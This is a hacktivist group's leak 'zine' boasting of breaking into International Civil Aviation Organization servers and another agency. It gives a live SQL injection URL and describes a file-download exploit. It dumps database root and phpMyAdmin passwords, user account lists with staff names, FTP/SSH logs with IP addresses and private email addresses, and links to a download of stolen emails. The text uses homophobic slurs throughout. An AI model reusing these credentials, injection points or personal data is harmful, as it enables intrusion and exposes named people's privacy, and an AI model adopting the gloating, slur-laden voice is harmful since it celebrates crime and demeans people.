smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/f
lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/fa
postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin
www:*:70:70:World Wide Web Server:/Library/WebServer:/us
eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/b
qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/
cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
appserver:*:79:79:Application Server:/var/empty:/usr/bin
unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
We also managed to prove that they do indeed log, and that their claims were indeed bullshit; That is included in the download, along with 40,000 Emails from their smtp.
By the way, STCU works with WMD(Weapons Of Mass Destruction workers.) Through one of the SQL Injections, we noticed a DB called PPDB2 that had tables called "WeaponCode" several of them too, didn't bother with it; but, yeah.
Enjoy reading 30k+ emails, and owning fagots who make the weapons that destroy the world.
████ █ █████ ██████ ████ █████
█ █ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █
█████ █ █ ██████ █ █
█ █ █ █ █ █ █
█ █ █ █ █ █ █ █ █
████ █ █████ ██████ █ █ █████
Alright, we're going to start this off with something fucking hilarious we found in their PHPBB Forum:
if ( !defined('IN_PHPBB') ) { die("Hacking attempt"); }
LMFAO, That is pretty damn great; Now, what is ICAO?
The International Civil Aviation Organization is a specialized agency of the United Nations.
It codifies the principles and techniques of international air navigation and fosters the planning and development of international air transport to ensure safe and orderly growth.
Its headquarters are located in the Quartier International of Montreal, Quebec, Canada.
Well, first off we found a MSACCESS SQL Injection on legacy.icao.int: http://legacy.icao.int/fsix/auditRep3_icvm.cfm?s=Solomon%20Islands&i=159
From the injection? We weren't able to do much, couldn't find the propper tables and only loaded the drives:
legacy.icao.int drives:
A = Disk or network error
C = Could not find file 'C:\.mdb'.
D = Disk or network error.
E = Could not find file 'E:\.mdb'.
G = Could not find file 'G:\.mdb'.
S = Could not find file 'S:\.mdb'.
So, we did some more research; Came across paris.icao.int which had a local file download exploit; and, whelp, the rest is history.
paris.icao.int:
MySQL root login:
�1$dbhost = "localhost"; //Hostname of the MySQL-Server $dbname = "docman_open_meetings"; //Database-Name $dbuser = "root"; //Database-Username $dbpass = "paco6433"; //Database-Password�
/*
* phpMyAdmin configuration storage settings.
*/
/* User used to manipulate with storage */
$cfg['Servers'][$i]['controluser'] = 'aqueos_pma';
$cfg['Servers'][$i]['controlpass'] = 'Aque0SRT56uUU87';
// configuration speciale
// rien de special
phpmyadminkey: 9CgJjGCjG3KZSyajtvxGrpB3mp6ZYKf1pJlfvl61ruKwf
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:netfab06:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
cyrus:*:60:60:The Cyrus mail server:/nonexistent:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
webadmin:*:79:79:Web Admin:/www:/bin/csh
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
netfa5:*:1001:1001:Administrative User:/home/netfa5:/bin/tcsh
aqadmin:*:47000:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/aqadmin:/bin/tcsh
aqbaseuser:*:47001:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/baseuser:/sbin/nologin
aqbackup:*:47003:4733:Utilisateur de backup, ne pas detruire.:/usr/local/.aqadmin/home/backup:/bin/sh
aqmonitoring:*:47002:4733:Utilisateur de surveillance serveur, ne pas detruire.:/usr/local/.aqadmin/home/monitoring:/usr/sbin/nologin
accesclient:*:47100:4733:Utilisateur d administration pour le client, ne pas detruire.:/home/accesclient:/bin/tcsh
mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
icaobigmanitou:*:1002:1002:webmaster:/home/icaobigmanitou:/sbin/nologin
administrator:*:1005:1005:Administrator:/home/administrator:/sbin/nologin
gfirican:*:1011:1011:George FIRICAN:/home/gfirican:/sbin/nologin
icaoeurnat:*:1012:1012:Official E-mail:/home/icaoeurnat:/sbin/nologin
jlevina:*:1014:1014:Johanna LEVINA:/home/jlevina:/sbin/nologin
ngoldschmid:*:1021:1021:Nikki GOLDSCHMID:/home/ngoldschmid:/sbin/nologin
pcuff:*:1024:1024:Patricia CUFF:/home/pcuff:/sbin/nologin
sfoure:*:1027:1027:Severine FOURE:/home/sfoure:/sbin/nologin
vkourenkov:*:1028:1028:Victor KOURENKOV:/home/vkourenkov:/sbin/nologin
lsuleymanova:*:1034:1034:Leyla Suleymanova:/home/lsuleymanova:/sbin/nologin
smtprelay:*:1037:1037:smtprelay:/home/smtprelay:/sbin/nologin
webmaster:*:1038:1038:WEBMASTER:/home/webmaster:/sbin/nologin
pcaviston1:*:1043:1043:Patricia CAVISTON:/home/pcaviston1:/sbin/nologin
pcaviston:*:1044:1044:Patricia CAVISTON:/home/pcaviston:/sbin/nologin
safireicao:*:1045:1045:SAFIREICAO:/home/safireicao:/sbin/nologin
enahmadov:*:1047:1047:Elkhan NAHMADOV:/home/enahmadov:/sbin/nologin
cdaly:*:1048:1048:Catherine DALY:/home/cdaly:/sbin/nologin
reception:*:1049:1049:Reception:/home/reception:/sbin/nologin
adm:*:1055:1055:ADMINISTRATION:/home/adm:/sbin/nologin
rdimartino:*:1056:1056:Rosa Di Martino:/home/rdimartino:/sbin/nologin
fbrosseau:*:1057:1057:Frédéric Brosseau:/home/fbrosseau:/sbin/nologin
nrallo:*:1058:1058:Nicolas Rallo:/home/nrallo:/sbin/nologin
jmasson:*:1059:1059:Jérémie MASSON:/home/jmasson:/sbin/nologin
skacprzak:*:1061:1061:Sebastian Kacprzak:/home/skacprzak:/sbin/nologin
lvonlanthen:*:1062:1062:Leon Vonlanthen:/home/lvonlanthen:/sbin/nologin
comregister:*:1064:1064:comregister:/home/comregister:/sbin/nologin
safire:*:1065:1065:safire:/home/safire:/sbin/nologin
natfig:*:1066:1066:natfig:/home/natfig:/sbin/nologin
ihofstetter:*:1069:1069:Isabelle HOFSTETTER:/home/ihofstetter:/sbin/nologin
llazosilva:*:1070:1070:Lino LAZO SILVA:/home/llazosilva:/sbin/nologin
bbenoist:*:1071:1071:Ben Benoist:/home/bbenoist:/sbin/nologin
eandd:*:1072:1072:EANDD:/home/eandd:/sbin/nologin
shalle:*:1073:1073:Sven HALLE:/home/shalle:/sbin/nologin
cottieno:*:1074:1074:Carolyne OTTIENO:/home/cottieno:/sbin/nologin
glpi:*:1075:1075:GLPI:/home/glpi:/sbin/nologin
amoater:*:1076:1076:Aurel Moater:/home/amoater:/sbin/nologin
lfonsecaalmeida:*:1078:1078:Luis Fonseca de Almeida:/home/lfonsecaalmeida:/sbin/nologin
ckeohan:*:1080:1080:Christopher KEOHAN:/home/ckeohan:/sbin/nologin
rsaidi:*:1081:1081:Rime Saidi:/home/rsaidi:/sbin/nologin
cludorf:*:1082:1082:Cornelia Ludorf:/home/cludorf:/sbin/nologin
rsalomon:*:1083:1083:Rodolphe SALOMON:/home/rsalomon:/sbin/nologin
adesaintseine:*:1084:1084:Amy de SAINT SEINE:/home/adesaintseine:/sbin/nologin
jludorf:*:1085:1085:Jürgen LUDORF:/home/jludorf:/sbin/nologin
admleave:*:1086:1086:ADM Leave:/home/admleave:/sbin/nologin
emurdoch:*:1087:1087:Eileen Murdoch:/home/emurdoch:/sbin/nologin
fax-in:*:1088:1088:Fax-IN:/home/fax-in:/sbin/nologin
cfigueiredo:*:1090:1090:Celso do Couto FIGUEIREDO:/home/cfigueiredo:/sbin/nologin
mmincic:*:1091:1091:Masa MINCIC:/home/mmincic:/sbin/nologin
fax-in2:*:1092:1092:fax-in2:/home/fax-in2:/sbin/nologin
bbrunette:*:1093:1093:Benoit BRUNETTE:/home/bbrunette:/sbin/nologin
lfigueiredo:*:1094:1094:Luis Pedro FIGUEIREDO:/home/lfigueiredo:/sbin/nologin
jricchetti:*:1095:1095:Joelle Ricchetti:/home/jricchetti:/sbin/nologin
donotreply:*:1096:1096:donotreply:/home/donotreply:/sbin/nologin
FTP & SSH log:
ftp7524 ftp 120.11.168.201 E5:Sftp7524 120.11.168.201 Ê5:Sftp7555 ftp 221.203.97.34 �6:Sftp7555 221.203.97.34 6:Sftp8836 ftp 112.197.0.121 ÂF:Sftp8836 112.197.0.121 ÏF:Sftp9909 ftp 36.33.33.235 �R:Sftp9909 36.33.33.235 �R:Sftp3423 ftp 82.78.32.101 ²s:Sftp3443 ftp 125.76.163.137 ñs:Sftp3443 125.76.163.137 �t:Sftp3423 82.78.32.101 2t:Sftp3603 ftp 114.39.30.54 Bu:Sftp3603 114.39.30.54 Ku:Sftp3990 ftp 115.47.9.141 lx:Sftp3990 115.47.9.141 vx:Sftp4044 ftp 14.198.72.4 �y:Sftp4044 14.198.72.4 Ey:Sftp6992 ftp 61.219.91.207 J’:Sftp6992 61.219.91.207 …’:Sftp7564 ftp 123.247.15.92 Ú—:Sftp7564 123.247.15.92 š˜:Sftp8719 ftp 85.185.238.216 ¢:Sftp8719 85.185.238.216 œ¢:Sftp9643 ftp 134.249.97.161 ëª:Sftp9643 134.249.97.161 ýª:Sftp9920 ftp 117.194.197.24 g:Sftp9920 117.194.197.24 q:Sftp1673 ftp 39.1.1.60 ܽ:Sftp1673 39.1.1.60 9¾:Sftp1953 ftp 123.195.45.36 ¢À:Sftp1953 123.195.45.36 ÜÀ:Sftp2783 ftp 117.223.132.208 ÖÈ:Sftp2783 117.223.132.208 ÷È:Sftp4489 ftp 114.39.9.89 oÚ:Sftp4489 114.39.9.89 ƒÚ:Sftp1812 ftp 85.100.5.98 v#;Sftp1812 85.100.5.98 “#;Sftp2576 ftp 220.133.175.190 E+;Sftp2576 220.133.175.190 —+;Sftp7643 ftp 36.225.78.230 �d;Sftp7643 36.225.78.230 cd;Sftp8478 ftp 61.219.91.207 Än;Sftp8478 61.219.91.207 o;Sftp8711 ftp 5.165.83.10 ¤p;Sftp8711 5.165.83.10 ³p;Sftp8736 ftp 112.197.0.121 �q;Sftp8736 112.197.0.121 �q;Sftp6551 ftp 112.90.231.27 ö†;Sftp6551 112.90.231.27 �‡;Sftp1312 ftp 49.159.169.40 a;Sftp1312 49.159.169.40 Ì;Sftp2030 ftp 101.17.42.34 Θ;Sftp2030 101.17.42.34 Û˜;Sftp3687 ftp 178.187.232.203 z«;Sftp3687 178.187.232.203 Œ«;Sftp4408 ftp 111.37.6.21 �³;Sftp4408 111.37.6.21 &³;Sftp6377 ftp 82.114.80.154 áÆ;Sftp6377 82.114.80.154 èÆ;Sftp6954 ftp 124.228.11.92 ÛÌ;Sftp6954 124.228.11.92 øÌ;Sftp7124 ftp 223.82.145.125 VÎ;Sftp7124 223.82.145.125 kÎ;Sftp7664 ftp 223.78.158.133 ¼Ó;Sftp7664 223.78.158.133 ÆÓ;Sftp9560 ftp 221.196.153.2 %å;Sftp9560 221.196.153.2 1å;Sftp5390 ftp 1.52.237.140 �î;Sftp5390 1.52.237.14 0 �î;Sftp1766 ftp 1.165.195.171 ‰ù;Sftp1766 1.165.195.171 —ù;Sftp2714 ftp 113.227.42.32 ¿�<Sftp2714 113.227.42.32 Í�<Sftp2782 ftp 111.37.11.38 �<Sftp2782 111.37.11.38 +�<Sftp3867 ftp 36.225.78.230 ô
<Sftp3867 36.225.78.230 •�<Sftp8382 ftp 58.42.237.32 6;<Sftp8382 58.42.237.32 M;<Sftp8509 ftp 123.201.4.120 †<<Sftp8509 123.201.4.120 ¦<<Sftp9240 ftp 115.47.9.141 ;D<Sftp9240 115.47.9.141 KD<Sftp2979 ftp 116.113.47.38 bm<Sftp2979 116.113.47.38 ¦m<Sftp3612 ftp 219.142.42.9 Gt<Sftp3612 219.142.42.9 Xt<Sftp3734 ftp 89.209.126.207 gu<Sftp3734 89.209.126.207 ou<Sftp8197 ftp 221.203.97.34 ¦¦<Sftp8197 221.203.97.34 ²¦<Sftp8629 ftp 218.65.246.44 q¬<Sftp8629 218.65.246.44 ¬<Sftp8877 ftp 221.194.231.19 z¯<Sftp8877 221.194.231.19 ¯<Sftp8883 ftp 112.233.202.250 ¤¯<Sftp8883 112.233.202.250 Ư<Sftp2042 ftp 124.202.160.186 ]½<Sftp2042 124.202.160.186 j½<Sftp4303 ftp 99.137.34.85 žÀ<Sftp4303 99.137.34.85 µÀ<Sftp7700 ftp 60.10.57.89 òÃ<Sftp7700 60.10.57.89 Ä<Sftp2438 ftp 94.89.82.162 Ã×<Sftp2438 94.89.82.162 AØ<Sftp3216 ftp 119.183.122.170 â<Sftp3216 119.183.122.170 aâ<Sftp3665 ftp 218.205.36.192 ¾ç<Sftp3665 218.205.36.192 Ñç<Sftp3721 ftp 112.197.0.121 ’è<Sftp3721 112.197.0.121 è<Sftp4258 ftp 116.207.53.177 �ï<Sftp4258 116.207.53.177 +ï<Sftp4633 ftp 121.16.150.181 ¥ó<Sftp4633 121.16.150.181 Øó<Sftp5598 ftp 117.170.250.137 Áþ<Sftp5598 117.170.250.137 Ïþ<Sftp9610 ftp 115.249.55.107 ’&=Sftp9610 115.249.55.107 š&=Sftp9738 ftp 82.137.12.34 e'=Sftp9738 82.137.12.34 Ö.=Sftp3307 ftp 183.131.67.229 .I=Sftp3307 183.131.67.229 <I=Sftp4127 ftp 1.214.254.122 ÀP=Sftp4127 1.214.254.122 ÌP=Sftp5110 ftp 124.202.160.186 "Y=Sftp5110 124.202.160.186 NY=Sftp7361 ftp 36.225.227.37 •l=Sftp7361 36.225.227.37 ïl=Sftp8583 ftp 220.170.208.223 Žy=Sftp8583 220.170.208.223 Åy=Sftp8778 ftp 117.136.37.2 {=Sftp8778 117.136.37.2 Ø{=Sftp8992 ftp 222.126.146.107 %~=Sftp8992 222.126.146.107 :~=Sftp9382 ftp 222.189.57.182 Œ‚=Sftp9382 222.189.57.182 ´‚=Sftp2136 ftp 115.47.9.141 Û =Sftp2136 115.47.9.141 �¡=Sftp3424 ftp 221.14.147.109 �>Sftp3424 221.14.147.109 Â�>Sftp4797 ftp 180.215.124.28 k/>Sftp4797 180.215.124.28 ,0>Sftp6193 ftp 180.218.2.84 oA>Sftp6193 180.218.2.84 ‚A>Sftp9563 ftp 42.118.228.12 0h>Sftp9563 42.118.228.12 Fh>Sftp3632 ftp 1.171.25.34 …Ž>Sftp3632 1.171.25.34 œŽ>Sftp8037 ftp 134.255.142.228 ̺>Sftp8037 134.255.142.228 Òº>Sftp2210 ftp 93.179.103.57 ŸÏ>Sftp2210 93.179.103.57 ÇÏ>Sftp1904 ftp 78.189.127.105 S�?Sftp1904 78.189.127.105 Y�?Sftp2687 ftp 99.137.34.85 j�?Sftp2687 99.137.34.85 €�?Sftp9053 ftp 116.77.115.3
=?Sftp9053 116.77.115.3 �=?Sftp6037 ftp 61.172.115.227 ÏM?Sftp6037 61.172.115.227 åM?Sftp2233 ftp 222.126.146.107 }]?Sftp2233 222.126.146.107 ‡]?Sftp3817 ftp 113.240.231.170 /o?Sftp3817 113.240.231.170 Eo?Sftp7923 ftp 93.157.19.68 # ?Sftp7923 93.157.19.68 / ?Sftp8364 ftp 182.39.98.160 t¥?Sftp8364 182.39.98.160 ‡¥?Sftp6371 ftp 61.172.115.227 éb@Sftp6371 61.172.115.227 öb@Sftp8246 ftp 78.189.127.105 Ãw@Sftp8246 78.189.127.105 Ëw@Sftp6628 ftp 178.33.21.143 ®Ü@Sftp6628 178.33.21.143 ¯Ü@Sftp634 ftp 125.104.83.30 ?�ASftp634 125.104.83.30 I�ASftp5341 ftp 27.38.38.128 =�BSftp5341 27.38.38.128 O�BSftp1420 icaobigmanitou 94.228.187.146 åSBSftp1420 94.228.187.146 øSBSftp1923 icaobigmanitou 94.228.187.146 +TBSftp1923 94.228.187.146 2TBSftp2494 ftp 36.227.111.251 …ÅBSftp2494 36.227.111.251 ÅBSftp2830 ftp 222.126.146.107 �+CSftp2830 222.126.146.107 �+CSftp5453 ftp 36.239.34.122 ¼DCSftp5453 36.239.34.122 ÄDCSftp6925 ftp 114.39.29.94 ÜQCSftp6925 114.39.29.94 èQCSftp7034 ftp 1.52.237.230 êRCSftp7034 1.52.237.230 óRCSftp9194 ftp 60.29.59.58 ö»CSftp9194 60.29.59.58 ¼CSftp5759 ftp 221.1.213.86 ²úCSftp5759 221.1.213.86 ÎúCSftp3980 ftp 178.137.2.93 �KDSftp3980 178.137.2.93 RKDSftp3019 ftp 180.166.245.174 ·¯DSftp3019 180.166.245.174 ȯDSftp3387 ftp 123.171.4.157 ¹´DSftp3387 123.171.4.157 Ë´DSftp7297 ftp 119.86.148.103 GãDSftp7297 119.86.148.103 ZãDSftp2948 ftp 134.255.159.163 ù�ESftp2948 134.255.159.163 ý�ESftp5755 ftp 85.185.238.216 †3ESftp5755 85.185.238.216 “3ESftp9992 ftp 94.41.71.136 ÃYESftp9992 94.41.71.136 ØYESftp1697 ftp 58.116.64.8 9KFSftp1697 58.116.64.8 EKFSftp3896 ftp 58.116.64.8 À_FSftp3896 58.116.64.8 ù_FSftp9257 icaobigmanitou 94.228.187.146 Ç“FSftp9257 94.228.187.146 �•FSftp8567 ftp 49.159.169.40 Z£FSftp8567 49.159.169.40 u£FSftp7428 ftp 93.157.21.151 üåFSftp7428 93.157.21.151 �æFSftp4878 ftp 66.249.79.14 ð9GSftp4878 66.249.79.14 ñ9GSftp4879 ftp 66.249.74.104 ó9GSftp4879 66.249.74.104 ó9GSftp6702 ftp 36.239.32.22 èNGSftp6702 36.239.32.22 ôNGSftp5388 ftp 66.249.79.14 [®GSftp5388 66.249.79.14 \®GSftp2274 ftp 201.94.154.27 àñGSftp2274 201.94.154.27 çñGSftp4545 ftp 163.125.220.43 ÊzHSftp4545 163.125.220.43 ÓzHSftp6219 ftp 74.95.10.210 �ŒHSftp6219 74.95.10.210 �ŒHSftp7843 ftp 66.249.75.152 šžHSftp7843 66.249.75.152 šžHSftp7843 ftp 66.249.75.152 ›žHSftp7843 66.249.75.152 œžHSftp8698 ftp 188.253.41.195 †ÁHSftp8698 188.253.41.195 ŠÁHSftp3916 ftp 176.205.133.107 §èHSftp3916 176.205.133.107 ¯èHSftp6477 ftp 27.32.173.218 ‹ ISftp6477 27.32.173.218 Ê ISftp1711 ftp 5.53.205.21 PAISftp1711 5.53.205.21 sAISftp6754 ftp 221.196.55.244 „yISftp6754 221.196.55.244 ™yISftp8042 ftp 220.244.55.106 àxJSftp8042 220.244.55.106 þxJSftp9618 ftp 85.185.238.216 T‹JSftp9618 85.185.238.216 ^‹JSftp5554 ftp 94.41.85.175 BËJSftp5554 94.41.85.175 FËJSftp5664 ftp 60.29.59.58 íÌJSftp5664 60.29.59.58 üÌJSftp5736 ftp 222.141.54.78 zÍJSftp5736 222.141.54.78 “ÍJSftp3607 ftp 195.244.160.110 y�KSftp3607 195.244.160.110 z�KSftp1112 ftp 36.224.17.227 $
KSftp1112 36.224.17.227 ,
KSftp1258 ftp 178.33.21.143 Ä�KSftp1258 178.33.21.143 Æ�KSftp5674 ftp 36.227.173.52 {DKSftp5674 36.227.173.52 ƒDKSftp9286 ftp 178.187.221.145 JrKSftp9286 178.187.221.145 MrKSftp1629 ftp 119.9.69.153 •ŠKSftp1629 119.9.69.153 œŠKSftp1378 ftp 119.177.84.73 ¬ÝKSftp1378 119.177.84.73 ¶ÝKSftp3057 ftp 89.165.235.90 ÐëKSftp3057 89.165.235.90 ÒëKSftp7793 ftp 5.79.156.207 �LSftp7793 5.79.156.207 ‡�LSftp3582 ftp 89.165.235.90 øNLSftp3582 89.165.235.90 ûNLSftp2359 ftp 220.162.158.45 �›LSftp2359 220.162.158.45 �›LSftp3193 icaobigmanitou 94.228.187.146 [êLSftp3350 ftp 222.161.213.41 �ëLSftp3350 222.161.213.41 hìLSftp3985 icaobigmanitou 94.228.187.146 �ñLSftp3193 94.228.187.146 bñLSftp4024 icaobigmanitou 94.228.187.146 xñLSftp4024 icaobigmanitou 94.228.187.146 yñLSftp4129 icaobigmanitou 94.228.187.146 +òLSftp4129 icaobigmanitou 94.228.187.146 +òLSftp4147 icaobigmanitou 94.228.187.146 DòLSftp4154 icaobigmanitou 94.228.187.146 SòLSftp4129 94.228.187.146 [óLSftp3985 94.228.187.146 kóLSftp4449 icaobigmanitou 94.228.187.146 0õLSftp4024 94.228.187.146 HöLSftp4613 icaobigmanitou 94.228.187.146 “öLSftp4704 icaobigmanitou 94.228.187.146 ˆ÷LSftp4147 94.228.187.146 «÷LSftp4129 94.228.187.146 ŸøLSftp4154 94.228.187.146 ÇùLSftp5263 icaobigmanitou 94.228.187.146 ¤üLSftp5364 icaobigmanitou 94.228.187.146 €ýLSftp4449 94.228.187.146 ²ýLSftp4704 94.228.187.146 “þLSftp5548 icaobigmanitou 94.228.187.146 BÿLSftp5263 94.228.187.146
MSftp5655 icaobigmanitou 94.228.187.146 % MSftp4613 94.228.187.146 Y MSftp5945 icaobigmanitou 94.228.187.146 7�MSftp4024 94.228.187.146 N�MSftp6481 icaobigmanitou 94.228.187.146 ^ MSftp5655 94.228.187.146 ˜ MSftp6543 icaobigmanitou 94.228.187.146 ð MSftp6576 icaobigmanitou 94.228.187.146 B�MSftp5945 94.228.187.146 � MSftp6543 94.228.187.146 Z MSftp8044 ftp 89.184.108.5 ù�MSftp8044 89.184.108.5 û�MSftp8189 icaobigmanitou 94.228.187.146 B�MSftp5364 94.228.187.146 Y�MSftp8485 icaobigmanitou 94.228.187.146 Ë�MSftp6576 94.228.187.146 á�MSftp8771 icaobigmanitou 94.228.187.146 ��MSftp6481 94.228.187.146 ��MSftp5548 94.228.187.146 v�MSftp8771 94.228.187.146 v�MSftp8485 94.228.187.146 v�MSftp8189 94.228.187.146 �MSftp6296 ftp 1.171.49.232 ��NSftp6296 1.171.49.232 ��NSftp3599 ftp 2.49.213.192 ÿ'NSftp3599 2.49.213.192 �(NSftp5729 ftp 113.162.216.160 g=NSftp5729 113.162.216.160 p=NSftp7059 ftp 180.166.7.134 ÐINSftp7059 180.166.7.134 ×INSftp7267 ftp 78.189.192.133 ÓKNSftp7267 78.189.192.133 ßKNSftp9511 icaobigmanitou 94.228.187.146 ˜`NSftp9525 icaobigmanitou 94.228.187.146 º`NSftp9542 icaobigmanitou 94.228.187.146 �aNSftp9542 94.228.187.146 �aNSftp9525 94.228.187.146 �aNSftp9511 94.228.187.146 �aNSftp1108 ftp 86.106.172.126 #qNSftp1108 86.106.172.126 HqNSftp1364 ftp 71.6.165.200 ˜sNSftp1364 71.6.165.200 ˜sNSftp7878 ftp 93.114.240.222 m°NSftp7878 93.114.240.222 o°NSftp9979 ftp 5.206.125.68 ?ÇNSftp9979 5.206.125.68 BÇNSftp8649 ftp 180.218.30.189 Á+OSftp8649 180.218.30.189 É+OSftp1848 ftp 113.162.216.160 ©SOSftp1848 113.162.216.160 ³SOSftp2952 ftp 213.111.216.109 =`OSftp2952 213.111.216.109 T`OSftp4844 ftp 178.95.196.144 �vOSftp4844 178.95.196.144 �vOSftp7634 ftp 5.165.95.101 *”OSftp7634 5.165.95.101 ,”OSftp8082 icaobigmanitou 94.228.187.146 �™OSftp8082 94.228.187.146 2™OSftp8181 icaobigmanitou 94.228.187.146 *šOSftp8181 94.228.187.146 0šOSftp8830 ftp 1.170.123.218 ± OSftp8830 1.170.123.218 » OSftp9202 ftp 116.202.154.234 ñ£OSftp9202 116.202.154.234 �¤OSftp3903 ftp 182.180.89.201 éÏOSftp3903 182.180.89.201 ðÏOSftp7906 ftp 213.155.207.228 —çOSftp7906 213.155.207.228 £çOSftp1440 ftp 37.113.3.99 �üOSftp1440 37.113.3.99
üOSftp3488 ftp 89.149.94.150 D�PSftp3488 89.149.94.150 G�PSftp1774 ftp 49.254.137.34 #iPSftp1774 49.254.137.34 +iPSftp5173 ftp 180.218.48.24 Í¥PSftp5173 180.218.48.24 Õ¥PSftp8104 ftp 198.20.70.114 ¬ÍPSftp8104 198.20.70.114 ÍPSftp4246 ftp 178.94.209.169 _�QSftp4246 178.94.209.169 d�QSftp5829 ftp 123.195.113.183 Á#QSftp5829 123.195.113.183 Ù#QSftp9356 ftp 67.215.9.229 „ÄQSftp9356 67.215.9.229 IÆQSftp2030 ftp 116.224.67.61 ~äQSftp2030 116.224.67.61 ˆäQSftp4267 ftp 61.172.115.229 S�RSftp4267 61.172.115.229 _�RSftp5270 ftp 14.139.244.115 w�RSftp5270 14.139.244.115 �RSftp6046 ftp 164.100.6.2 ��RSftp6046 164.100.6.2 �RSftp4571 ftp 5.165.70.234 +„RSftp4571
5.165.70.234 3„RSftp6092 ftp 50.23.237.141 *�SSftp6092 50.23.237.141 0�SS
lastlog:
’_NSttyp0 94.228.187.146 à�§Rttyp0 94.228.187.146 S� Sttyp0 adsl1.aqueos.co
/etc/aliases:
paris.icao.int~soaeurnat: mbeland@paris.icao.int, gfirican@paris.icao.int, vkourenkov@paris.icao.int@paris.icao.int paris.icao.int~gvega: gvega53@gmail.com paris.icao.int~fjouve: fjouve75@aol.com
█████ █ █ ███████ ████ █████
█ █ █ █ █ █ █ █ █ - And download.
█ █ █ █ █ █ █ █
█ █ █ █ █ █ █ █
█████ █████ █ █ █████
o |
. -O-
. | * . -0- Until next time, fellas!
* o . ' * . o
. . | *
* * -O- .
. * | ,
. o
.---.
= _/__~0_\_ . * o '
= = (_________) .
. *
* - ) - *
. .
Aww, sad-face, NullCrew's zine is over? Yes, it is; but it's not the end of NullCrew or #FuckTheSystem.
We will continue on our way, flying our saucer over government fagots; dropping a probe, and having it shoved up theri anus.
It never ends, and we will never stop; Hacktivists, activists, and the people have all pointed their finger at this system.. and we will see it crumble.
This is also a thank you to those whom have stuck with us for this past year and some odd months.
Thank you to our fans, haters, and supporters; let us have a wonderful year, and show them what they don't want to see.
A nation united by people who have no fear, and see through your lies.. your shadows are being cast away, and do not affect us.
We are free, and that is a beautiful thing to say..
We know, we know! Enough with the rants, yes?
Here, have the download link already; you silly faggots, and one last thing:
█████████████████████████████████████████████████████████████████████████████
█ █
█ https://mega.co.nz/#!dcZiXaaa!G1HFhBgra3I51pxxiPsvUCV9mh-dMv2lA54bmERVPa8 █ █
█ █
█████████████████████████████████████████████████████████████████████████████
dm
MMr
4MMML .
MMMMM. xf
. "M6MMM .MM-
Mh.. +MM5MMM .MMMM
.MMM. .MMMMML. MMMMMh
)MMMh. MM5MMM MMMMMMM
3MMMMx. 'MMM3MMf xnMMMMMM"
'*MMMMM MMMMMM. nMMMMMMP"
*MMMMMx "MMM5M\ .MMMMMMM=
*MMMMMh "MMMMM" JMMMMMMP
MMMMMM GMMMM. dMMMMMM .
MMMMMM "MMMM .MMMMM( .nnMP"
.. *MMMMx MMM" dMMMM" .nnMMMMM*
"MMn... 'MMMMr 'MM MMM" .nMMMMMMM*"
"4MMMMnn.. *MMM MM MMP" .dMMMMMMM""
^MMMMMMMMx. *ML "M .M* .MMMMMM**"
*PMMMMMMhn. *x > M .MMMM**""
""**MMMMhx/.h/ .=*"
.3P"%....
nP" "*MMnx
db db .d8b. d8888b. d8888b. db db j88D .d888b. .d88b. db
88 88 d8' `8b 88 `8D 88 `8D `8b d8' j8~88 VP `8D .8P 88. 88
88ooo88 88ooo88 88oodD' 88oodD' `8bd8' j8' 88 odD' 88 d'88 YP
88~~~88 88~~~88 88~~~ 88~~~ 88 V88888D .88' 88 d' 88 - Especially you, silly govt.
88 88 88 88 88 88 88 88 j88. `88 d8' db
YP YP YP YP 88 88 YP VP 888888D `Y88P' YP
From your friendly neighborhood aliens! - NullCrew
twitter.com/NullCrew_FTS
